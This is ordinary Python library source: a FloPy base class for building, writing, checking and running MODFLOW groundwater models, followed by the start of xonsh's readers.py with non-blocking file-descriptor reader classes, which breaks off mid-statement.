ModelInterface(object): def __init__(self): self._mg_resync = True self._modelgrid = None @property @abc.abstractmethod def modelgrid(self): raise NotImplementedError( 'must define modelgrid in child ' 'class to use this base class') @property @abc.abstractmethod def packagelist(self): raise NotImplementedError( 'must define packagelist in child ' 'class to use this base class') @property @abc.abstractmethod def namefile(self): raise NotImplementedError( 'must define namefile in child ' 'class to use this base class') @property @abc.abstractmethod def model_ws(self): raise NotImplementedError( 'must define model_ws in child ' 'class to use this base class') @property @abc.abstractmethod def exename(self): raise NotImplementedError( 'must define exename in child ' 'class to use this base class') @property @abc.abstractmethod def version(self): raise NotImplementedError( 'must define version in child ' 'class to use this base class') @property @abc.abstractmethod def solver_tols(self): raise NotImplementedError( 'must define version in child ' 'class to use this base class') @abc.abstractmethod def export(self, f, **kwargs): raise NotImplementedError( 'must define export in child ' 'class to use this base class') @property @abc.abstractmethod def laytyp(self): raise NotImplementedError( 'must define laytyp in child ' 'class to use this base class') @property @abc.abstractmethod def hdry(self): raise NotImplementedError( 'must define hdry in child ' 'class to use this base class') @property @abc.abstractmethod def hnoflo(self): raise NotImplementedError( 'must define hnoflo in child ' 'class to use this base class') @property @abc.abstractmethod def laycbd(self): raise NotImplementedError( 'must define laycbd in child ' 'class to use this base class') @property @abc.abstractmethod def verbose(self): raise NotImplementedError( 'must define verbose in child ' 'class to use this base class') class BaseModel(ModelInterface): """ MODFLOW based models base class Parameters ---------- modelname : string Name of the model. Model files will be given this name. (default is 'modflowtest' namefile_ext : string name file extension (default is 'nam') exe_name : string name of the modflow executable model_ws : string Path to the model workspace. Model files will be created in this directory. Default is None, in which case model_ws is assigned to the current working directory. """ def __init__(self, modelname='modflowtest', namefile_ext='nam', exe_name='mf2k.exe', model_ws=None, structured=True, verbose=False, **kwargs): """ BaseModel init """ ModelInterface.__init__(self) self.__name = modelname self.namefile_ext = namefile_ext or '' self._namefile = self.__name + '.' + self.namefile_ext self._packagelist = [] self.heading = '' self.exe_name = exe_name self._verbose = verbose self.external_extension = 'ref' if model_ws is None: model_ws = os.getcwd() if not os.path.exists(model_ws): try: os.makedirs(model_ws) except: print( '\n{0:s} not valid, workspace-folder was changed to {1:s}\n'.format( model_ws, os.getcwd())) model_ws = os.getcwd() self._model_ws = model_ws self.structured = structured self.pop_key_list = [] self.cl_params = '' # check for reference info in kwargs # we are just carrying these until a dis package is added xll = kwargs.pop("xll", None) yll = kwargs.pop("yll", None) self._xul = kwargs.pop("xul", None) if self._xul is not None: warnings.warn('xul/yul have been deprecated. Use xll/yll instead.', DeprecationWarning) self._yul = kwargs.pop("yul", None) if self._yul is not None: warnings.warn('xul/yul have been deprecated. Use xll/yll instead.', DeprecationWarning) rotation = kwargs.pop("rotation", 0.0) proj4_str = kwargs.pop("proj4_str", None) self._start_datetime = kwargs.pop("start_datetime", "1-1-1970") # build model discretization objects self._modelgrid = Grid(proj4=proj4_str, xoff=xll, yoff=yll, angrot=rotation) self._modeltime = None # Model file information self.__onunit__ = 10 # external option stuff self.array_free_format = True self.free_format_input = True self.parameter_load = False self.array_format = None self.external_fnames = [] self.external_units = [] self.external_binflag = [] self.external_output = [] self.package_units = [] self._next_ext_unit = None # output files self.output_fnames = [] self.output_units = [] self.output_binflag = [] self.output_packages = [] return @property def modeltime(self): raise NotImplementedError( 'must define modeltime in child ' 'class to use this base class') @property def modelgrid(self): raise NotImplementedError( 'must define modelgrid in child ' 'class to use this base class') @property def packagelist(self): return self._packagelist @packagelist.setter def packagelist(self, packagelist): self._packagelist = packagelist @property def namefile(self): return self._namefile @namefile.setter def namefile(self, namefile): self._namefile = namefile @property def model_ws(self): return self._model_ws @model_ws.setter def model_ws(self, model_ws): self._model_ws = model_ws @property def exename(self): return self._exename @exename.setter def exename(self, exename): self._exename = exename @property def version(self): return self._version @version.setter def version(self, version): self._version = version @property def verbose(self): return self._verbose @verbose.setter def verbose(self, verbose): self._verbose = verbose @property def laytyp(self): if self.get_package("LPF") is not None: return self.get_package("LPF").laytyp.array if self.get_package("BCF6") is not None: return self.get_package("BCF6").laycon.array if self.get_package("UPW") is not None: return self.get_package("UPW").laycon.array return None @property def hdry(self): if self.get_package("LPF") is not None: return self.get_package("LPF").hdry if self.get_package("BCF6") is not None: return self.get_package("BCF6").hdry if self.get_package("UPW") is not None: return self.get_package("UPW").hdry return None @property def hnoflo(self): try: bas6 = self.get_package("BAS6") return bas6.hnoflo except AttributeError: return None @property def laycbd(self): try: dis = self.get_package("DIS") return dis.laycbd.array except AttributeError: return None # we don't need these - no need for controlled access to array_free_format # def set_free_format(self, value=True): # """ # Set the free format flag for the model instance # # Parameters # ---------- # value : bool # Boolean value to set free format flag for model. (default is True) # # Returns # ------- # # """ # if not isinstance(value, bool): # print('Error: set_free_format passed value must be a boolean') # return False # self.array_free_format = value # # def get_free_format(self): # """ # Return the free format flag for the model # # Returns # ------- # out : bool # Free format flag for the model # # """ # return self.array_free_format def next_unit(self, i=None): if i is not None: self.__onunit__ = i - 1 else: self.__onunit__ += 1 return self.__onunit__ def next_ext_unit(self): """ Function to encapsulate next_ext_unit attribute """ next_unit = self._next_ext_unit + 1 self._next_ext_unit += 1 return next_unit def export(self, f, **kwargs): # for pak in self.packagelist: # f = pak.export(f) # return f from .export import utils return utils.model_export(f, self, **kwargs) def add_package(self, p): """ Add a package. Parameters ---------- p : Package object """ for idx, u in enumerate(p.unit_number): if u != 0: if u in self.package_units or u in self.external_units: try: pn = p.name[idx] except: pn = p.name msg = "WARNING: unit {} ".format(u) + \ "of package {} already in use".format(pn) print(msg) self.package_units.append(u) for i, pp in enumerate(self.packagelist): if pp.allowDuplicates: continue elif isinstance(p, type(pp)): print('****Warning -- two packages of the same type: ', type(p), type(pp)) print('replacing existing Package...') self.packagelist[i] = p return if self.verbose: print('adding Package: ', p.name[0]) self.packagelist.append(p) def remove_package(self, pname): """ Remove a package from this model Parameters ---------- pname : string Name of the package, such as 'RIV', 'BAS6', etc. """ for i, pp in enumerate(self.packagelist): if pname.upper() in pp.name: if self.verbose: print('removing Package: ', pp.name) # Remove the package object from the model's packagelist p = self.packagelist.pop(i) # Remove the package unit number from the list of package # units stored with the model for iu in p.unit_number: if iu in self.package_units: self.package_units.remove(iu) return raise StopIteration( 'Package name ' + pname + ' not found in Package list') def __getattr__(self, item): """ __getattr__ - syntactic sugar Parameters ---------- item : str 3 character package name (case insensitive) or "sr" to access the SpatialReference instance of the ModflowDis object Returns ------- sr : SpatialReference instance pp : Package object Package object of type :class:`flopy.pakbase.Package` Note ---- if self.dis is not None, then the spatial reference instance is updated using self.dis.delr, self.dis.delc, and self.dis.lenuni before being returned """ if item == 'sr': if self.dis is not None: return self.dis.sr else: return None if item == 'tr': if self.dis is not None: return self.dis.tr else: return None if item == "start_datetime": if self.dis is not None: return self.dis.start_datetime else: return None return self.get_package(item) def get_ext_dict_attr(self, ext_unit_dict=None, unit=None, filetype=None, pop_key=True): iu = None fname = None if ext_unit_dict is not None: for key, value in ext_unit_dict.items(): if key == unit: iu = key fname = os.path.basename(value.filename) break elif value.filetype == filetype: iu = key fname = os.path.basename(value.filename) if pop_key: self.add_pop_key_list(iu) break return iu, fname def _output_msg(self, i, add=True): if add: txt1 = 'Adding' txt2 = 'to' else: txt1 = 'Removing' txt2 = 'from' msg = '{} {} '.format(txt1, self.output_fnames[i]) + \ '(unit={}) '.format(self.output_units[i]) + \ '{} the output list.'.format(txt2) print(msg) def add_output_file(self, unit, fname=None, extension='cbc', binflag=True, package=None): """ Add an ascii or binary output file file for a package Parameters ---------- unit : int unit number of external array fname : str filename of external array. (default is None) extension : str extension to use for the cell-by-cell file. Only used if fname is None. (default is cbc) binflag : bool boolean flag indicating if the output file is a binary file. Default is True package : str string that defines the package the output file is attached to. Default is None """ add_cbc = False if unit > 0: add_cbc = True # determine if the file is in external_units if abs(unit) in self.external_units: idx = self.external_units.index(abs(unit)) if fname is None: fname = os.path.basename(self.external_fnames[idx]) binflag = self.external_binflag[idx] self.remove_external(unit=abs(unit)) # determine if the unit exists in the output data if abs(unit) in self.output_units: add_cbc = False idx = self.output_units.index(abs(unit)) # determine if binflag has changed if binflag is not self.output_binflag[idx]: add_cbc = True if add_cbc: self.remove_output(unit=abs(unit)) else: if package is not None: self.output_packages[idx].append(package) if add_cbc: if fname is None: fname = self.name + '.' + extension # check if this file name exists for a different unit number if fname in self.output_fnames: idx = self.output_fnames.index(fname) iut = self.output_units[idx] if iut != unit: # include unit number in fname if package has # not been passed if package is None: fname = self.name + '.{}.'.format(unit) \ + extension # include package name in fname else: fname = self.name + '.{}.'.format(package) \ + extension else: fname = os.path.basename(fname) self.add_output(fname, unit, binflag=binflag, package=package) return def add_output(self, fname, unit, binflag=False, package=None): """ Assign an external array so that it will be listed as a DATA or DATA(BINARY) entry in the name file. This will allow an outside file package to refer to it. Parameters ---------- fname : str filename of external array unit : int unit number of external array binflag : boolean binary or not. (default is False) """ if fname in self.output_fnames: print("BaseModel.add_output() warning: " + "replacing existing filename {0}".format(fname)) idx = self.output_fnames.index(fname) if self.verbose: self._output_msg(idx, add=False) self.output_fnames.pop(idx) self.output_units.pop(idx) self.output_binflag.pop(idx) self.output_packages.pop(idx) self.output_fnames.append(fname) self.output_units.append(unit) self.output_binflag.append(binflag) if package is not None: self.output_packages.append([package]) else: self.output_packages.append([]) if self.verbose: self._output_msg(-1, add=True) return def remove_output(self, fname=None, unit=None): """ Remove an output file from the model by specifying either the file name or the unit number. Parameters ---------- fname : str filename of output array unit : int unit number of output array """ if fname is not None: for i, e in enumerate(self.output_fnames): if fname in e: if self.verbose: self._output_msg(i, add=False) self.output_fnames.pop(i) self.output_units.pop(i) self.output_binflag.pop(i) self.output_packages.pop(i) elif unit is not None: for i, u in enumerate(self.output_units): if u == unit: if self.verbose: self._output_msg(i, add=False) self.output_fnames.pop(i) self.output_units.pop(i) self.output_binflag.pop(i) self.output_packages.pop(i) else: raise Exception( ' either fname or unit must be passed to remove_output()') return def get_output(self, fname=None, unit=None): """ Get an output file from the model by specifying either the file name or the unit number. Parameters ---------- fname : str filename of output array unit : int unit number of output array """ if fname is not None: for i, e in enumerate(self.output_fnames): if fname in e: return self.output_units[i] return None elif unit is not None: for i, u in enumerate(self.output_units): if u == unit: return self.output_fnames[i] return None else: raise Exception( ' either fname or unit must be passed to get_output()') return def set_output_attribute(self, fname=None, unit=None, attr=None): """ Set a variable in an output file from the model by specifying either the file name or the unit number and a dictionary with attributes to change. Parameters ---------- fname : str filename of output array unit : int unit number of output array """ idx = None if fname is not None: for i, e in enumerate(self.output_fnames): if fname in e: idx = i break return None elif unit is not None: for i, u in enumerate(self.output_units): if u == unit: idx = i break else: raise Exception( ' either fname or unit must be passed ' + ' to set_output_attribute()') if attr is not None: if idx is not None: for key, value in attr.items: if key == 'binflag': self.output_binflag[idx] = value elif key == 'fname': self.output_fnames[idx] = value elif key == 'unit': self.output_units[idx] = value return def get_output_attribute(self, fname=None, unit=None, attr=None): """ Get a attribute for an output file from the model by specifying either the file name or the unit number. Parameters ---------- fname : str filename of output array unit : int unit number of output array """ idx = None if fname is not None: for i, e in enumerate(self.output_fnames): if fname in e: idx = i break return None elif unit is not None: for i, u in enumerate(self.output_units): if u == unit: idx = i break else: raise Exception( ' either fname or unit must be passed ' + ' to set_output_attribute()') v = None if attr is not None: if idx is not None: if attr == 'binflag': v = self.output_binflag[idx] elif attr == 'fname': v = self.output_fnames[idx] elif attr == 'unit': v = self.output_units[idx] return v def add_external(self, fname, unit, binflag=False, output=False): """ Assign an external array so that it will be listed as a DATA or DATA(BINARY) entry in the name file. This will allow an outside file package to refer to it. Parameters ---------- fname : str filename of external array unit : int unit number of external array binflag : boolean binary or not. (default is False) """ if fname in self.external_fnames: print("BaseModel.add_external() warning: " + "replacing existing filename {}".format(fname)) idx = self.external_fnames.index(fname) self.external_fnames.pop(idx) self.external_units.pop(idx) self.external_binflag.pop(idx) self.external_output.pop(idx) if unit in self.external_units: print("BaseModel.add_external() warning: " + "replacing existing unit {}".format(unit)) idx = self.external_units.index(unit) self.external_fnames.pop(idx) self.external_units.pop(idx) self.external_binflag.pop(idx) self.external_output.pop(idx) self.external_fnames.append(fname) self.external_units.append(unit) self.external_binflag.append(binflag) self.external_output.append(output) return def remove_external(self, fname=None, unit=None): """ Remove an external file from the model by specifying either the file name or the unit number. Parameters ---------- fname : str filename of external array unit : int unit number of external array """ plist = [] if fname is not None: for i, e in enumerate(self.external_fnames): if fname in e: plist.append(i) elif unit is not None: for i, u in enumerate(self.external_units): if u == unit: plist.append(i) else: raise Exception( ' either fname or unit must be passed to remove_external()') # remove external file j = 0 for i in plist: ipos = i - j self.external_fnames.pop(ipos) self.external_units.pop(ipos) self.external_binflag.pop(ipos) self.external_output.pop(ipos) j += 1 return def add_existing_package(self, filename, ptype=None, copy_to_model_ws=True): """ Add an existing package to a model instance. Parameters ---------- filename : str the name of the file to add as a package ptype : optional the model package type (e.g. "lpf", "wel", etc). If None, then the file extension of the filename arg is used copy_to_model_ws : bool flag to copy the package file into the model_ws directory. Returns ------- None """ if ptype is None: ptype = filename.split('.')[-1] ptype = str(ptype).upper() # for pak in self.packagelist: # if ptype in pak.name: # print("BaseModel.add_existing_package() warning: " +\ # "replacing existing package {0}".format(ptype)) class Obj(object): pass fake_package = Obj() fake_package.write_file = lambda: None fake_package.extra = [''] fake_package.name = [ptype] fake_package.extension = [filename.split('.')[-1]] fake_package.unit_number = [self.next_ext_unit()] if copy_to_model_ws: base_filename = os.path.split(filename)[-1] fake_package.file_name = [base_filename] shutil.copy2(filename, os.path.join(self.model_ws, base_filename)) else: fake_package.file_name = [filename] fake_package.allowDuplicates = True self.add_package(fake_package) def get_name_file_entries(self): """ Get a string representation of the name file. Parameters ---------- """ s = '' for p in self.packagelist: for i in range(len(p.name)): if p.unit_number[i] == 0: continue s += '{:14s} {:5d} '.format(p.name[i], p.unit_number[i]) + \ '{:s} {:s}\n'.format(p.file_name[i], p.extra[i]) return s def has_package(self, name): """ Check if package name is in package list. Parameters ---------- name : str Name of the package, 'DIS', 'BAS6', etc. (case-insensitive). Returns ------- bool True if package name exists, otherwise False if not found. """ if not name: raise ValueError('invalid package name') name = name.upper() for p in self.packagelist: for pn in p.name: if pn.upper() == name: return True return False def get_package(self, name): """ Get a package. Parameters ---------- name : str Name of the package, 'RIV', 'LPF', etc. (case-insensitive). Returns ------- pp : Package object Package object of type :class:`flopy.pakbase.Package` """ if not name: raise ValueError('invalid package name') name = name.upper() for pp in (self.packagelist): if pp.name[0].upper() == name: return pp return None def get_package_list(self, ftype=None): """ Get a list of all the package names. Parameters ---------- ftype : str Type of package, 'RIV', 'LPF', etc. Returns ------- val : list of strings Can be used to see what packages are in the model, and can then be used with get_package to pull out individual packages. """ val = [] for pp in (self.packagelist): if ftype is None: val.append(pp.name[0].upper()) elif pp.package_type.lower() == ftype: val.append(pp.name[0].upper()) return val def set_version(self, version): self.version = version.lower() # check that this is a valid model version if self.version not in list(self.version_types.keys()): err = 'Error: Unsupported model version ({}).'.format( self.version) + \ ' Valid model versions are:' for v in list(self.version_types.keys()): err += ' {}'.format(v) raise Exception(err) # set namefile heading heading = '# Name file for ' + \ '{}, '.format(self.version_types[self.version]) + \ 'generated by Flopy version {}.'.format(__version__) self.heading = heading # set heading for each package for p in self.get_package_list(): pak = self.get_package(p) heading = '# {} package for '.format(pak.name[0]) + \ '{}, '.format(self.version_types[self.version]) + \ 'generated by Flopy version {}.'.format(__version__) pak.heading = heading return None def change_model_ws(self, new_pth=None, reset_external=False): """ Change the model work space. Parameters ---------- new_pth : str Location of new model workspace. If this path does not exist, it will be created. (default is None, which will be assigned to the present working directory). Returns ------- val : list of strings Can be used to see what packages are in the model, and can then be used with get_package to pull out individual packages. """ if new_pth is None: new_pth = os.getcwd() if not os.path.exists(new_pth): try: line = '\ncreating model workspace...\n' + \ ' {}'.format(new_pth) print(line) os.makedirs(new_pth) except: line = '\n{} not valid, workspace-folder '.format(new_pth) raise OSError(line) # line = '\n{} not valid, workspace-folder '.format(new_pth) + \ # 'was changed to {}\n'.format(os.getcwd()) # print(line) # new_pth = os.getcwd() # --reset the model workspace old_pth = self._model_ws self._model_ws = new_pth line = '\nchanging model workspace...\n {}\n'.format(new_pth) sys.stdout.write(line) # reset the paths for each package for pp in (self.packagelist): pp.fn_path = os.path.join(self.model_ws, pp.file_name[0]) # create the external path (if needed) if hasattr(self, "external_path") and self.external_path is not None \ and not os.path.exists(os.path.join(self._model_ws, self.external_path)): pth = os.path.join(self._model_ws, self.external_path) os.makedirs(pth) if reset_external: self._reset_external(pth, old_pth) elif reset_external: self._reset_external(self._model_ws, old_pth) return None def _reset_external(self, pth, old_pth): new_ext_fnames = [] for ext_file, output in zip(self.external_fnames, self.external_output): # new_ext_file = os.path.join(pth, os.path.split(ext_file)[-1]) # this is a wicked mess if output: # new_ext_file = os.path.join(pth, os.path.split(ext_file)[-1]) new_ext_file = ext_file else: # fpth = os.path.abspath(os.path.join(old_pth, ext_file)) # new_ext_file = os.path.relpath(fpth, os.path.abspath(pth)) fdir = os.path.dirname(ext_file) if fdir == '': fpth = os.path.abspath(os.path.join(old_pth, ext_file)) else: fpth = ext_file ao = os.path.abspath(os.path.dirname(fpth)) ep = os.path.abspath(pth) relp = os.path.relpath(ao, ep) new_ext_file = os.path.join(relp, os.path.basename(ext_file)) new_ext_fnames.append(new_ext_file) self.external_fnames = new_ext_fnames @property def model_ws(self): return copy.deepcopy(self._model_ws) def _set_name(self, value): """ Set model name Parameters ---------- value : str Name to assign to model. """ self.__name = str(value) self.namefile = self.__name + '.' + self.namefile_ext for p in self.packagelist: for i in range(len(p.extension)): p.file_name[i] = self.__name + '.' + p.extension[i] p.fn_path = os.path.join(self.model_ws, p.file_name[0]) def __setattr__(self, key, value): if key == "free_format_input": # if self.bas6 is not None: # self.bas6.ifrefm = value super(BaseModel, self).__setattr__(key, value) elif key == "name": self._set_name(value) elif key == "model_ws": self.change_model_ws(value) elif key == "sr": assert isinstance(value, utils.reference.SpatialReference) warnings.warn( "SpatialReference has been deprecated.", category=DeprecationWarning) if self.dis is not None: self.dis.sr = value else: raise Exception("cannot set SpatialReference -" "ModflowDis not found") elif key == "tr": assert isinstance(value, discretization.reference.TemporalReference) if self.dis is not None: self.dis.tr = value else: raise Exception("cannot set TemporalReference -" "ModflowDis not found") elif key == "start_datetime": if self.dis is not None: self.dis.start_datetime = value self.tr.start_datetime = value else: raise Exception("cannot set start_datetime -" "ModflowDis not found") else: super(BaseModel, self).__setattr__(key, value) def run_model(self, silent=False, pause=False, report=False, normal_msg='normal termination'): """ This method will run the model using subprocess.Popen. Parameters ---------- silent : boolean Echo run information to screen (default is True). pause : boolean, optional Pause upon completion (default is False). report : boolean, optional Save stdout lines to a list (buff) which is returned by the method . (default is False). normal_msg : str Normal termination message used to determine if the run terminated normally. (default is 'normal termination') Returns ------- (success, buff) success : boolean buff : list of lines of stdout """ return run_model(self.exe_name, self.namefile, model_ws=self.model_ws, silent=silent, pause=pause, report=report, normal_msg=normal_msg) def load_results(self): print('load_results not implemented') return None def write_input(self, SelPackList=False, check=False): """ Write the input. Parameters ---------- SelPackList : False or list of packages """ if check: # run check prior to writing input self.check(f='{}.chk'.format(self.name), verbose=self.verbose, level=1) # reset the model to free_format if parameter substitution was # performed on a model load if self.parameter_load and not self.free_format_input: if self.verbose: print('\nResetting free_format_input to True to ' + 'preserve the precision of the parameter data.') self.free_format_input = True if self.verbose: print('\nWriting packages:') if SelPackList == False: for p in self.packagelist: if self.verbose: print(' Package: ', p.name[0]) # prevent individual package checks from running after # model-level package check above # otherwise checks are run twice # or the model level check procedure would have to be split up # or each package would need a check argument, # or default for package level check would have to be False try: p.write_file(check=False) except TypeError: p.write_file() else: for pon in SelPackList: for i, p in enumerate(self.packagelist): if pon in p.name: if self.verbose: print(' Package: ', p.name[0]) try: p.write_file(check=False) except TypeError: p.write_file() break if self.verbose: print(' ') # write name file self.write_name_file() # os.chdir(org_dir) return def write_name_file(self): """ Every Package needs its own writenamefile function """ raise Exception( 'IMPLEMENTATION ERROR: writenamefile must be overloaded') def set_model_units(self): """ Every model needs its own set_model_units method """ raise Exception( 'IMPLEMENTATION ERROR: set_model_units must be overloaded') @property def name(self): """ Get model name Returns ------- name : str name of model """ return copy.deepcopy(self.__name) def add_pop_key_list(self, key): """ Add a external file unit number to a list that will be used to remove model output (typically binary) files from ext_unit_dict. Parameters ---------- key : int file unit number Returns ------- Examples -------- """ if key not in self.pop_key_list: self.pop_key_list.append(key) def check(self, f=None, verbose=True, level=1): """ Check model data for common errors. Parameters ---------- f : str or file handle String defining file name or file handle for summary file of check method output. If a string is passed a file handle is created. If f is None, check method does not write results to a summary file. (default is None) verbose : bool Boolean flag used to determine if check method results are written to the screen level : int Check method analysis level. If level=0, summary checks are performed. If level=1, full checks are performed. Returns ------- None Examples -------- >>> import flopy >>> m = flopy.modflow.Modflow.load('model.nam') >>> m.check() """ # check instance for model-level check chk = utils.check(self, f=f, verbose=verbose, level=level) results = {} for p in self.packagelist: if chk.package_check_levels.get(p.name[0].lower(), 0) <= level: results[p.name[0]] = p.check(f=None, verbose=False, level=level - 1) # model level checks # solver check if self.version in chk.solver_packages.keys(): solvers = set(chk.solver_packages[self.version]).intersection( set(self.get_package_list())) if not solvers: chk._add_to_summary('Error', desc='\r No solver package', package='model') elif len(list(solvers)) > 1: for s in solvers: chk._add_to_summary('Error', desc='\r Multiple solver packages', package=s) else: chk.passed.append('Compatible solver package') # check for unit number conflicts package_units = {} duplicate_units = {} for p in self.packagelist: for i in range(len(p.name)): if p.unit_number[i] != 0: if p.unit_number[i] in package_units.values(): duplicate_units[p.name[i]] = p.unit_number[i] otherpackage = [k for k, v in package_units.items() if v == p.unit_number[i]][0] duplicate_units[otherpackage] = p.unit_number[i] if len(duplicate_units) > 0: for k, v in duplicate_units.items(): chk._add_to_summary('Error', package=k, value=v, desc='unit number conflict') else: chk.passed.append('Unit number conflicts') # add package check results to model level check summary for k, r in results.items(): if r is not None and r.summary_array is not None: # currently SFR doesn't have one chk.summary_array = np.append(chk.summary_array, r.summary_array).view( np.recarray) chk.passed += ['{} package: {}'.format(r.package.name[0], psd) for psd in r.passed] chk.summarize() return chk def plot(self, SelPackList=None, **kwargs): """ Plot 2-D, 3-D, transient 2-D, and stress period list (MfList) model input data Parameters ---------- SelPackList : bool or list List of of packages to plot. If SelPackList=None all packages are plotted. (default is None) **kwargs : dict filename_base : str Base file name that will be used to automatically generate file names for output image files. Plots will be exported as image files if file_name_base is not None. (default is None) file_extension : str Valid matplotlib.pyplot file extension for savefig(). Only used if filename_base is not None. (default is 'png') mflay : int MODFLOW zero-based layer number to return. If None, then all all layers will be included. (default is None) kper : int MODFLOW zero-based stress period number to return. (default is zero) key : str MfList dictionary key. (default is None) Returns ---------- axes : list Empty list is returned if filename_base is not None. Otherwise a list of matplotlib.pyplot.axis are returned. See Also -------- Notes ----- Examples -------- >>> import flopy >>> ml = flopy.modflow.Modflow.load('test.nam') >>> ml.plot() """ from flopy.plot import PlotUtilities axes = PlotUtilities._plot_model_helper(self, SelPackList=SelPackList, **kwargs) return axes def to_shapefile(self, filename, package_names=None, **kwargs): """ Wrapper function for writing a shapefile for the model grid. If package_names is not None, then search through the requested packages looking for arrays that can be added to the shapefile as attributes Parameters ---------- filename : string name of the shapefile to write package_names : list of package names (e.g. ["dis","lpf"]) Packages to export data arrays to shapefile. (default is None) Returns ------- None Examples -------- >>> import flopy >>> m = flopy.modflow.Modflow() >>> m.to_shapefile('model.shp', SelPackList) """ warnings.warn("to_shapefile() is deprecated. use .export()") self.export(filename, package_names=package_names) return def run_model(exe_name, namefile, model_ws='./', silent=False, pause=False, report=False, normal_msg='normal termination', use_async=False, cargs=None): """ This function will run the model using subprocess.Popen. It communicates with the model's stdout asynchronously and reports progress to the screen with timestamps Parameters ---------- exe_name : str Executable name (with path, if necessary) to run. namefile : str Namefile of model to run. The namefile must be the filename of the namefile without the path. Namefile can be None to allow programs that do not require a control file (name file) to be passed as a command line argument. model_ws : str Path to the location of the namefile. (default is the current working directory - './') silent : boolean Echo run information to screen (default is True). pause : boolean, optional Pause upon completion (default is False). report : boolean, optional Save stdout lines to a list (buff) which is returned by the method . (default is False). normal_msg : str Normal termination message used to determine if the run terminated normally. (default is 'normal termination') use_async : boolean asynchronously read model stdout and report with timestamps. good for models that take long time to run. not good for models that run really fast cargs : str or list of strings additional command line arguments to pass to the executable. Default is None Returns ------- (success, buff) success : boolean buff : list of lines of stdout """ success = False buff = [] # convert normal_msg to lower case for comparison if isinstance(normal_msg, str): normal_msg = [normal_msg.lower()] elif isinstance(normal_msg, list): for idx, s in enumerate(normal_msg): normal_msg[idx] = s.lower() # Check to make sure that program and namefile exist exe = which(exe_name) if exe is None: import platform if platform.system() in 'Windows': if not exe_name.lower().endswith('.exe'): exe = which(exe_name + '.exe') if exe is None: s = 'The program {} does not exist or is not executable.'.format( exe_name) raise Exception(s) else: if not silent: s = 'FloPy is using the following ' + \ ' executable to run the model: {}'.format(exe) print(s) if namefile is not None: if not os.path.isfile(os.path.join(model_ws, namefile)): s = 'The namefile for this model ' + \ 'does not exists: {}'.format(namefile) raise Exception(s) # simple little function for the thread to target def q_output(output, q): for line in iter(output.readline, b''): q.put(line) # time.sleep(1) # output.close() # create a list of arguments to pass to Popen argv = [exe_name] if namefile is not None: argv.append(namefile) # add additional arguments to Popen arguments if cargs is not None: if isinstance(cargs, str): cargs = [cargs] for t in cargs: argv.append(t) # run the model with Popen proc = sp.Popen(argv, stdout=sp.PIPE, stderr=sp.STDOUT, cwd=model_ws) if not use_async: while True: line = proc.stdout.readline() c = line.decode('utf-8') if c != '': for msg in normal_msg: if msg in c.lower(): success = True break c = c.rstrip('\r\n') if not silent: print('{}'.format(c)) if report == True: buff.append(c) else: break return success, buff # some tricks for the async stdout reading q = Queue.Queue() thread = threading.Thread(target=q_output, args=(proc.stdout, q)) thread.daemon = True thread.start() failed_words = ["fail", "error"] last = datetime.now() lastsec = 0. while True: try: line = q.get_nowait() except Queue.Empty: pass else: if line == '': break line = line.decode().lower().strip() if line != '': now = datetime.now() dt = now - last tsecs = dt.total_seconds() - lastsec line = "(elapsed:{0})-->{1}".format(tsecs, line) lastsec = tsecs + lastsec buff.append(line) if not silent: print(line) for fword in failed_words: if fword in line: success = False break if proc.poll() is not None: break proc.wait() thread.join(timeout=1) buff.extend(proc.stdout.readlines()) proc.stdout.close() for line in buff: if normal_msg in line: print("success") success = True break if pause: input('Press Enter to continue...') return success, buff
readers.py
"""File handle readers and related tools.""" import ctypes import io import os import queue import sys import threading import time import xonsh.lazyimps as xli from xonsh.built_ins import XSH class QueueReader: """Provides a file-like interface to reading from a queue.""" def __init__(self, fd, timeout=None): """ Parameters ---------- fd : int A file descriptor timeout : float or None, optional The queue reading timeout. """ self.fd = fd self.timeout = timeout self.closed = False self.queue = queue.Queue() self.thread = None def close(self): """close the reader""" self.closed = True def is_fully_read(self): """Returns whether or not the queue is fully read and the reader is closed. """ return ( self.closed and (self.thread is None or not self.thread.is_alive()) and self.queue.empty() ) def read_queue(self): """Reads a single chunk from the queue. This is blocking if the timeout is None and non-blocking otherwise. """ try: return self.queue.get(block=True, timeout=self.timeout) except queue.Empty: return b"" def read(self, size=-1): """Reads bytes from the file.""" buf = bytearray() while size < 0 or len(buf) != size: line = self.read_queue() if line: buf += line else: break return buf def readline(self, size=-1): """Reads a line, or a partial line from the file descriptor.""" nl = b"\n" buf = bytearray() while size < 0 or len(buf) != size: line = self.read_queue() if line: buf += line if line.endswith(nl): break else: break return buf def _read_all_lines(self): """This reads all remaining lines in a blocking fashion.""" lines = [] while not self.is_fully_read(): chunk = self.read_queue() lines.extend(chunk.splitlines(keepends=True)) return lines def readlines(self, hint=-1): """Reads lines from the file descriptor. This is blocking for negative hints (i.e. read all the remaining lines) and non-blocking otherwise. """ if hint == -1: return self._read_all_lines() lines = [] while len(lines) != hint: chunk = self.read_queue() if not chunk: break lines.extend(chunk.splitlines(keepends=True)) return lines def fileno(self): """Returns the file descriptor number.""" return self.fd @staticmethod def readable(): """Returns true, because this object is always readable.""" return True def iterqueue(self): """Iterates through all remaining chunks in a blocking fashion.""" while not self.is_fully_read(): chunk = self.read_queue() if not chunk: continue yield chunk def populate_fd_queue(reader, fd, queue): """Reads 1 kb of data from a file descriptor into a queue. If this ends or fails, it flags the calling reader object as closed. """ while True: try: c = os.read(fd, 1024) except OSError: reader.closed = True break if c: queue.put(c) else: reader.closed = True break class NonBlockingFDReader(QueueReader): """A class for reading characters from a file descriptor on a background thread. This has the advantages that the calling thread can close the file and that the reading does not block the calling thread. """ def __init__(self, fd, timeout=None): """ Parameters ---------- fd : int A file descriptor timeout : float or None, optional The queue reading timeout. """ super().__init__(fd, timeout=timeout) # start reading from stream self.thread = threading.Thread( target=populate_fd_queue, args=(self, self.fd, self.queue) ) self.thread.daemon = True self.thread.start() def populate_buffer(reader, fd, buffer, chunksize): """Reads bytes from the file descriptor and copies them into a buffer. The reads happen in parallel using the pread() syscall; which is only available on POSIX systems. If the read fails for any reason, the reader is flagged as closed. """ offset = 0 while True: try: buf = os.pread(fd, chunksize, offset) except OSError: reader.closed = True break if buf: buffer.write(buf) offset += len(buf) else: reader.closed = True break class BufferedFDParallelReader: """Buffered, parallel background thread reader.""" def __init__(self, fd, buffer=None, chunksize=1024): """ Parameters ---------- fd : int File descriptor from which to read. buffer : binary file-like or None, optional A buffer to write bytes into. If None, a new BytesIO object is created. chunksize : int, optional The max size of the parallel reads, default 1 kb. """ self.fd = fd self.buffer = io.BytesIO() if buffer is None else buffer self.chunksize = chunksize self.closed = False # start reading from stream self.thread = threading.Thread( target=populate_buffer, 